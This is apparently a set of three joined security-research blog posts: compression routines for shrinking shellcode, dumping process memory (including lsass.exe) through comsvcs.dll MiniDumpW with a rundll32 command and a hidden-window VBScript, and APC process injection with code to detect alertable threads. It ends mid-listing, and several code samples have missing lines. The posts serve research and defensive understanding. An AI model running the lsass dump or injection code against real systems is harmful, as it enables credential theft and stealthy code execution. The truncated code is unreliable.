The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

The following list of viruses used compression back in the late 90s/early 00s. Itβs not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

• Redemption, by Jacky Qwerty/29A
• Inca, Hybris, by Vecna/29A
• Aldebaran, by Bozo/iKX
• Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
• BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
• Junkmail, Junkhtmail, by roy g biv/29A/defjam

The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

BCE that appeared in 29a#4 was disappointing with only an 8% compression ratio. BNCE that appeared in DCA#1 was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With exception to the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.

While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004. (shown in figure 1). NRV compression algorithms, similar to whatβs used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

Figure 1: Shellcode constructor by Z0MBiE/29A

UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides good compression ratio and the decompressor doesnβt contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isnβt open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

Other libraries worth mentioning that I didnβt think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

## 2. Windows NT Layer DLL

Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

• Compression

Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the compressed data and pass both memory buffer and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

```DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
ULONG                            wspace, fspace;
SIZE_T                           outlen;
DWORD                            len;
NTSTATUS                         nts;
PVOID                            ws, outbuf;
HMODULE                          m;
RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
RtlCompressBuffer_t              RtlCompressBuffer;

m = GetModuleHandle("ntdll");

if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
printf("Unable to resolve RTL API\n");
return 0;
}

// 1. obtain the size of workspace
nts = RtlGetCompressionWorkSpaceSize(
engine | COMPRESSION_ENGINE_MAXIMUM,
&wspace, &fspace);

if(nts == 0) {
// 2. allocate memory for workspace
ws = malloc(wspace);
if(ws != NULL) {
// 3. allocate memory for output
outbuf = malloc(inlen);
if(outbuf != NULL) {
// 4. compress data
nts = RtlCompressBuffer(
engine | COMPRESSION_ENGINE_MAXIMUM,
inbuf, inlen, outbuf, inlen, 0,
(PULONG)&outlen, ws);

if(nts == 0) {
// 5. write the original length
WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0);
// 6. write compressed data to file
WriteFile(outfile, outbuf, outlen, &len, 0);
}
// 7. free output buffer
free(outbuf);
}
// 8. free workspace
free(ws);
}
}
return outlen;
}
```
• Decompression

`LZNT1` and `Xpress` data can be unpacked using RtlDecompressBuffer, however, `Xpress Huffman` data can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2. The last two require a WorkSpace buffer.

```    typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
USHORT                 CompressionFormatAndEngine,
PUCHAR                 UncompressedBuffer,
ULONG                  UncompressedBufferSize,
PUCHAR                 CompressedBuffer,
ULONG                  CompressedBufferSize,
PULONG                 FinalUncompressedSize,
PVOID                  WorkSpace);

DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
ULONG                            wspace, fspace;
SIZE_T                           outlen = 0;
DWORD                            len;
NTSTATUS                         nts;
PVOID                            ws, outbuf;
HMODULE                          m;
RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
RtlDecompressBufferEx_t          RtlDecompressBufferEx;

m = GetModuleHandle("ntdll");

if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
printf("Unable to resolve RTL API\n");
return 0;
}

// 1. obtain the size of workspace
nts = RtlGetCompressionWorkSpaceSize(
engine | COMPRESSION_ENGINE_MAXIMUM,
&wspace, &fspace);

if(nts == 0) {
// 2. allocate memory for workspace
ws = malloc(wspace);
if(ws != NULL) {
// 3. allocate memory for output
outlen = *(DWORD*)inbuf;
outbuf = malloc(outlen);

if(outbuf != NULL) {
// 4. decompress data
nts = RtlDecompressBufferEx(
engine | COMPRESSION_ENGINE_MAXIMUM,
outbuf, outlen,
(PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD),
(PULONG)&outlen, ws);

if(nts == 0) {
// 5. write decompressed data to file
WriteFile(outfile, outbuf, outlen, &len, 0);
} else {
printf("RtlDecompressBufferEx failed with %08lx\n", nts);
}
// 6. free output buffer
free(outbuf);
} else {
printf("malloc() failed\n");
}
// 7. free workspace
free(ws);
}
}
return outlen;
}
```

## 3. Windows Compression API

Despite being well documented and offering better compression ratios than `RtlCompressBuffer`, itβs unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. To demonstrate using these API, see xpress.c

### Compression

```DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
COMPRESSOR_HANDLE ch = NULL;
BOOL              r;
SIZE_T            outlen, len;
LPVOID            outbuf;
DWORD             wr;

// Create a compressor
r = CreateCompressor(engine, NULL, &ch);

if(r) {
// Query compressed buffer size.
Compress(ch, inbuf, inlen, NULL, 0, &len);
if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
// allocate memory for compressed data
outbuf = malloc(len);
if(outbuf != NULL) {
// Compress data and write data to outbuf.
r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
// if compressed ok, write to file
if(r) {
WriteFile(outfile, outbuf, outlen, &wr, NULL);
} else xstrerror("Compress()");
free(outbuf);
} else xstrerror("malloc()");
} else xstrerror("Compress()");
CloseCompressor(ch);
} else xstrerror("CreateCompressor()");
return r;
}
```

### Decompression

```DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
DECOMPRESSOR_HANDLE dh = NULL;
BOOL                r;
SIZE_T              outlen, len;
LPVOID              outbuf;
DWORD               wr;

// Create a decompressor
r = CreateDecompressor(engine, NULL, &dh);

if(r) {
// Query Decompressed buffer size.
Decompress(dh, inbuf, inlen, NULL, 0, &len);
if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
// allocate memory for decompressed data
outbuf = malloc(len);
if(outbuf != NULL) {
// Decompress data and write data to outbuf.
r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
// if decompressed ok, write to file
if(r) {
WriteFile(outfile, outbuf, outlen, &wr, NULL);
} else xstrerror("Decompress()");
free(outbuf);
} else xstrerror("malloc()");
} else xstrerror("Decompress()");
CloseDecompressor(dh);
} else xstrerror("CreateDecompressor()");
return r;
}
```

## 4. Windows Packaging API

If youβre a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). Thereβs also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, thereβs no reason why you canβt. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

## 5. Windows Imaging API (WIM)

These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive thatβs then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, thereβs no way to work with .wim files in memory using these API.

For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

## 6. Direct3D HLSL Compiler

Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, they use the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. The algorithms provide higher quality compression rates than anything else available on Windows. The compression ratio was 60% for a 1MB EXE file and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe OpenGL API could likely be used in a similar way.

### Compression

```#pragma comment(lib, "D3DCompiler.lib")
#include <d3dcompiler.h>
uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {

HRESULT         hr;
ID3DBlob        *blob;
SIZE_T          outlen = 0;
LPVOID          outbuf;
HANDLE          file;
DWORD           len;

file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(file == INVALID_HANDLE_VALUE) return 0;

dsa.pBytecode      = inbuf;
dsa.BytecodeLength = inlen;

// compress data
if(hr == S_OK) {
// write to file
outlen = blob->lpVtbl->GetBufferSize(blob);
outbuf = blob->lpVtbl->GetBufferPointer(blob);

WriteFile(file, outbuf, outlen, &len, 0);
blob->lpVtbl->Release(blob);
}
CloseHandle(file);
return outlen;
}
```

### Decompression

```uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
HRESULT         hr;
ID3DBlob        *blob;
SIZE_T          outlen = 0;
LPVOID          outbuf;
HANDLE          file;
DWORD           len;

// create file to save decompressed data to
file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(file == INVALID_HANDLE_VALUE) return 0;

dsa.pBytecode      = inbuf;
dsa.BytecodeLength = inlen;

// decompress buffer
hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
if(hr == S_OK) {
// write to file
outlen = blob->lpVtbl->GetBufferSize(blob);
outbuf = blob->lpVtbl->GetBufferPointer(blob);

WriteFile(file, outbuf, outlen, &len, 0);
blob->lpVtbl->Release(blob);
}
CloseHandle(file);
return outlen;
}
```

The main problem with dynamically resolving these API is knowing what version is installed. The file name on my Windows 10 system is βD3DCompiler_47.dllβ. It will likely be different on legacy systems.

## 7. Windows-internal libarchive library

Since the release of Windows 10 build 17063, the tape archiving tool βbsdtarβ is available and uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on windows supports bzip2, compress and gzip formats. Although, bsdtar shows support for xz and lzma, at least on my system along with lzip, they appear to be unsupported.

## 8. LibreSSL Cryptography Library

Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so itβs entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

## 9. Windows.Storage.Compression

This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. `CreateCompressor` is invoked with the `COMPRESS_RAW` flag set. It also invokes SetCompressorInformation with `COMPRESS_INFORMATION_CLASS_BLOCK_SIZE` flag if the user specifies one in the Compressor method.

## 10. Windows Undocumented API

DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and canβt be resolved dynamically via `GetProcAddress.` However, between at least Windows 7 and 10 is a DLL called PresentationNative_v0300.dll that can be found in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I havenβt investigated this thoroughly enough.) Four public symbols grabbed my attention, which are `ums_deflate_init`, `ums_deflate`, `ums_inflate_init` and `ums_inflate`. For a PoC demonstrating how to use them, see winflate.c

### Compression

The following code uses zlib.h to compress a buffer and write to file.

```DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
SIZE_T             outlen, len;
LPVOID             outbuf;
DWORD              wr;
HMODULE            m;
z_stream           ds;
ums_deflate_t      ums_deflate;
ums_deflate_init_t ums_deflate_init;
int                err;

if(ums_deflate_init == NULL || ums_deflate == NULL) {
printf("  [ unable to resolve deflate API.\n");
return 0;
}
// allocate memory for compressed data
outbuf = malloc(inlen);
if(outbuf != NULL) {
// Compress data and write data to outbuf.
ds.zalloc    = Z_NULL;
ds.zfree     = Z_NULL;
ds.opaque    = Z_NULL;
ds.avail_in  = (uInt)inlen;       // size of input
ds.next_in   = (Bytef *)inbuf;    // input buffer
ds.avail_out = (uInt)inlen;       // size of output buffer
ds.next_out  = (Bytef *)outbuf;   // output buffer

if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
// write the original length first
WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
// then the data
WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
FlushFileBuffers(outfile);
} else {
printf("  [ ums_deflate() : %x\n", err);
}
} else {
printf("  [ ums_deflate_init()\n");
}
free(outbuf);
}
return 0;
}
```

### Decompression

Inflating/decompressing the data is based on an example using zlib.

```DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
SIZE_T             outlen, len;
LPVOID             outbuf;
DWORD              wr;
HMODULE            m;
z_stream           ds;
ums_inflate_t      ums_inflate;
ums_inflate_init_t ums_inflate_init;

if(ums_inflate_init == NULL || ums_inflate == NULL) {
printf("  [ unable to resolve inflate API.\n");
return 0;
}
// allocate memory for decompressed data
outlen = *(DWORD*)inbuf;
outbuf = malloc(outlen*2);

if(outbuf != NULL) {
// decompress data and write data to outbuf.
ds.zalloc    = Z_NULL;
ds.zfree     = Z_NULL;
ds.opaque    = Z_NULL;
ds.avail_in  = (uInt)inlen - 8;       // size of input
ds.next_in   = (Bytef*)inbuf + 4;     // input buffer
ds.avail_out = (uInt)outlen*2;        // size of output buffer
ds.next_out  = (Bytef*)outbuf;        // output buffer

printf("  [ initializing inflate...\n");
if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
printf("  [ inflating...\n");
if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
FlushFileBuffers(outfile);
} else {
printf("  [ ums_inflate()\n");
}
} else {
printf("  [ ums_inflate_init()\n");
}
free(outbuf);
} else {
printf("  [ malloc()\n");
}
return 0;
}
```

## 11. Summary/Results

That sums up the algorithms I think are suitable for a shellcode. For the moment, UCL and apultra seem to provide the best solution. Using Windows API is a good option. They are also susceptible to monitoring and may not be portable. One area I didnβt cover due to time is Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

Library / API Algorithm / Engine Compression Ratio
RtlCompressBuffer LZNT1 39%
RtlCompressBuffer Xpress 47%
RtlCompressBuffer Xpress Huffman 53%
Compress MSZIP 55%
Compress Xpress 40%
Compress Xpress Huffman 48%
Compress LZMS 58%
aPLib N/A 45%
UCL N/A 42%
Undocumented API DEFLATE 46%

shellcode_generator

odzhan

modexp

# MiniDumpWriteDump via COM+ Services DLL

## Introduction

This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didnβt find it before is because I was searching for βMiniDumpWβ and not βMiniDumpβ.

While searching for DLL/EXE that imported DBGHELP!MiniDumpWriteDump, I discovered comsvcs.dll exports a function called `MiniDumpW` which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and third requires the keyword βfullβ even though thereβs no alternative for this last parameter.

To use from the command line, type the following: `"rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full""` where β1234β is the target process to dump. Obviously, this assumes you have permission to query and read the memory of target process. If `COMSVCS!MiniDumpW` encounters an error, it simply calls `KERNEL32!ExitProcess` and you wonβt see anything. The following code in C demonstrates how to invoke it dynamically.

BTW, `HRESULT` is probably the wrong return type. Internally it exits the process with `E_INVALIDARG` if it encounters a problem with the parameters, but if it succeeds, it returns 1. S_OK is defined as 0.

```#define UNICODE
#include <windows.h>
#include <stdio.h>

typedef HRESULT (WINAPI *_MiniDumpW)(
DWORD arg1, DWORD arg2, PWCHAR cmdline);

ULONG Privilege, BOOL Enable,

// "<pid> <dump.bin> full"
int wmain(int argc, wchar_t *argv[]) {
HRESULT             hr;
_MiniDumpW          MiniDumpW;
ULONG               t;

if(MiniDumpW == NULL) {
printf("Unable to resolve COMSVCS!MiniDumpW.\n");
return 0;
}
// try enable debug privilege

printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);

// dump process
MiniDumpW(0, 0,  argv[1]);
printf("OK!\n");

return 0;
}
```

Since neither rundll32 nor `comsvcs!MiniDumpW` will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.

```Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
WScript.StdOut.WriteLine("Usage: procdump <process>")
WScript.Quit
Else
Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp

' get process id or name
pid = WScript.Arguments(0)

' connect with debug privilege
Set fso  = CreateObject("Scripting.FileSystemObject")
Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")

' if not a number
If(Not IsNumeric(pid)) Then
query = "Name"
Else
query = "ProcessId"
End If

' try find it
Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
query & " = '" & pid & "'")

If (list.Count = 0) Then
WScript.StdOut.WriteLine("Can't find active process : " & pid)
WScript.Quit()
End If

For Each proc in list
pid = proc.ProcessId
str = proc.Name
Exit For
Next

dmp = fso.GetBaseName(str) & ".bin"

' if dump file already exists, try to remove it
If(fso.FileExists(dmp)) Then
WScript.StdOut.WriteLine("Removing " & dmp)
fso.DeleteFile(dmp)
End If

WScript.StdOut.WriteLine("Attempting to dump memory from " & _
str & ":" & pid & " to " & dmp)

Set proc       = svc.Get("Win32_Process")
Set startup    = svc.Get("Win32_ProcessStartup")
Set cfg        = startup.SpawnInstance_
cfg.ShowWindow = SW_HIDE

cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
pid & " " & fso.GetAbsolutePathName(".") & "\" & _
dmp & " full"

Call proc.Create (cmd, null, cfg, pid)

' sleep for a second
Wscript.Sleep(1000)

If(fso.FileExists(dmp)) Then
WScript.StdOut.WriteLine("Memory saved to " & dmp)
Else
WScript.StdOut.WriteLine("Something went wrong.")
End If
End If
```

Run from elevated cmd prompt.

No idea how useful this could be, but since itβs part of the operating system, itβs probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process.

coms

odzhan

modexp

# Windows Process Injection: Asynchronous Procedure Call (APC)

## Introduction

An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation β Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked βhow to identify an alertable threadβ and were given an answer that didnβt work or were told itβs not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

A number of Windows API and the underlying system calls support asynchronous operations and specifically I/O completion routines.. A boolean parameter tells the kernel a calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via `NTDLL!KiUserApcDispatcher`. The following Win32 API can set threads to alertable.

A few others rarely mentioned involve working with files or named pipes that might be read or written to using overlapped operations. e.g ReadFile.

Unfortunately, thereβs no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode thereβs nothing similar, at least not that Iβm aware of.

## Method 1

First described and used by Tal Liberman in a technique he invented called AtomBombing.

β¦create an event for each thread in the target process, then ask each thread to set its corresponding event. β¦ wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

Based on this description, we take the following steps:

2. CreateEvent for each thread and DuplicateHandle for the target process.
3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
4. WaitForMultipleObjects until one of the event handles becomes signalled.

`MAXIMUM_WAIT_OBJECTS` is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

```HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
DWORD         i, cnt = 0;
HANDLE        evt[2], ss, ht, h = NULL,
hl[MAXIMUM_WAIT_OBJECTS],
sh[MAXIMUM_WAIT_OBJECTS],
th[MAXIMUM_WAIT_OBJECTS];
HMODULE       m;
LPVOID        f, rm;

// 1. Enumerate threads in target process
ss = CreateToolhelp32Snapshot(

if(ss == INVALID_HANDLE_VALUE) return NULL;

do {
// if not our target process, skip it
if(te.th32OwnerProcessID != pid) continue;
// if we can't open thread, skip it
FALSE,

if(ht == NULL) continue;
hl[cnt++] = ht;
// if we've reached MAXIMUM_WAIT_OBJECTS. break
if(cnt == MAXIMUM_WAIT_OBJECTS) break;
}

m  = GetModuleHandle(L"kernel32.dll");

for(i=0; i<cnt; i++) {
// 2. create event and duplicate in target process
sh[i] = CreateEvent(NULL, FALSE, FALSE, NULL);

DuplicateHandle(
GetCurrentProcess(),  // source process
sh[i],                // source handle to duplicate
hp,                   // target process
&th[i],               // target handle
0,
FALSE,
DUPLICATE_SAME_ACCESS);

// 3. Queue APC for thread passing target event handle
QueueUserAPC(f, hl[i], (ULONG_PTR)th[i]);
}

// 4. Wait for event to become signalled
i = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
if(i != WAIT_TIMEOUT) {
h = hl[i];
}

// 6. Close source + target handles
for(i=0; i<cnt; i++) {
CloseHandle(sh[i]);
CloseHandle(th[i]);
if(hl[i] != h) CloseHandle(hl[i]);
}
CloseHandle(ss);
return h;
}
```

## Method 2

At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques β Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. Thereβs currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

If you look at the disassembly of `KERNELBASE!SleepEx` on Windows 10 (shown in figure 1), you can see it invokes the NT system call, `NTDLL!ZwDelayExecution`.

Figure 1. Disassembly of SleepEx on Windows 10.

The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called `KERNELBASE!SleepEx`, the program counter (Rip on AMD64) should point to `NTDLL!ZwDelayExecution + 0x14` which is the address of the RETN opcode.

Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

This address can be used to determine if a thread has called `KERNELBASE!SleepEx`. To calculate it, we have two options. Add a hardcoded offset to the address returned by GetProcAddress for `NTDLL!ZwDelayExecution` or read the program counter after calling `KERNELBASE!SleepEx` from our own artificial thread.

For the second option, a simple application was written to run a thread and call asynchronous APIs with alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64) which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows output of this.

Figure 3. Win32 API and NT System Call Wrappers.

The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

Win32 API NT System Call
SleepEx `ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);`
WaitForSingleObjectEx
GetOverlappedResultEx
`ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);`
WaitForMultipleObjectsEx
WSAWaitForMultipleEvents
`NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, DWORD Timeout, BOOLEAN Alertable, PLARGE_INTEGER Timeout);`
SignalObjectAndWait `NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);`
MsgWaitForMultipleObjectsEx `NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);`
GetQueuedCompletionStatusEx `NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);`

The second step of detection involves reading the register that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first index of the stack register (Rsp) will contain the return address of caller, the next four will be the shadow, spill or home space to optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

Figure 4. Win64 Stack Layout.

Based on the prototypes shown in the above table, to determine if a thread is alertable, verify the register holding the Alertable parameter is TRUE or FALSE. The following code performs this.

```BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
CONTEXT   c;
DWORD     i;
ULONG_PTR p[8];
SIZE_T    rd;

c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;

for(i=0; i<6 && !alertable; i++) {
// compare address with program counter
switch(i) {
// ZwDelayExecution
case 0 : {
break;
}
// NtWaitForSingleObject
case 1 : {
break;
}
// NtWaitForMultipleObjects
case 2 : {
break;
}
// NtSignalAndWaitForSingleObject
case 3 : {
break;
}
// NtUserMsgWaitForMultipleObjectsEx
case 4 : {
break;
}
// NtRemoveIoCompletionEx
case 5 : {
break;
}
}
}
}
}
```

You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. This is a callee saved non-volatile register that should be preserved by any function that uses it. RCX, RDX, R8 and R9 are volatile registers and donβt need to be preserved. It just so happens the kernel overwrites R9 for `NtWaitForMultipleObjects` (shown in figure 5) and R8 for `NtSignalAndWaitForSingleObject` (shown in figure 6) hence the reason for checking Rsi instead. `BOOLEAN` is defined as an 8-bit type, so a mask of the register is performed before comparing with TRUE or FALSE.

Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

Figure 6. Rsi used to for Alertable parameter to NtSignalAndWaitForSingleObject.

```// thread to run alertable functions
HANDLE           *evt = (HANDLE)lpParameter;
HANDLE           port;
OVERLAPPED_ENTRY lap;
DWORD            n;

SleepEx(INFINITE, TRUE);

WaitForSingleObjectEx(evt[0], INFINITE, TRUE);

WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);

SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);

ResetEvent(evt[0]);
ResetEvent(evt[1]);

MsgWaitForMultipleObjectsEx(2, evt,

port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
CloseHandle(port);

return 0;
}

HANDLE        ss, ht, evt[2], h = NULL;
LPVOID        rm, sevt, f[6];
SIZE_T        rd;
DWORD         i;
CONTEXT       c;
ULONG_PTR     p;
HMODULE       m;

// using the offset requires less code but it may
// not work across all systems.
#ifdef USE_OFFSET
char *api[6]={
"ZwDelayExecution",
"ZwWaitForSingleObject",
"NtWaitForMultipleObjects",
"NtSignalAndWaitForSingleObject",
"NtUserMsgWaitForMultipleObjectsEx",
"NtRemoveIoCompletionEx"};

for(i=0; i<6; i++) {
m = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
f[i] = (LPBYTE)GetProcAddress(m, api[i]) + 0x14;
}
#else
evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);

// wait a moment for thread to initialize
Sleep(100);

m      = GetModuleHandle(L"kernel32.dll");

for(i=0; i<6; i++) {
c.ContextFlags = CONTEXT_CONTROL;
f[i] = (LPVOID)c.Rip;
// queue SetEvent for next function
QueueUserAPC(sevt, ht, (ULONG_PTR)evt);
}
CloseHandle(ht);
CloseHandle(evt[0]);
CloseHandle(evt[1]);
#endif

// Create a snapshot of threads
if(ss == INVALID_HANDLE_VALUE) return NULL;

do {
// if not our target process, skip it
if(te.th32OwnerProcessID != pid) continue;

// if we can't open thread, skip it
FALSE,

if(ht == NULL) continue;

// save handle and exit loop
h = ht;
break;
}
// else close it and continue
CloseHandle(ht);
}
// close snap shot
CloseHandle(ss);
return h;
}
```

## Conclusion

Although both methods work fine, the first has some advantages. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work and therefore hardcoded offsets may point to the wrong address. The compiled code in future builds may decide to use another non-volatile register to hold the alertable parameter. e.g RBX, RDI or RBP.

## Injection

After the difficult part of detecting alertable threads, the rest is fairly straight forward. The two main functions used for APC injection are:

The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

```NTSTATUS NtQueueApcThread(
IN  PVOID ApcRoutine,
IN  PVOID ApcRoutineContext OPTIONAL,
IN  PVOID ApcStatusBlock OPTIONAL,
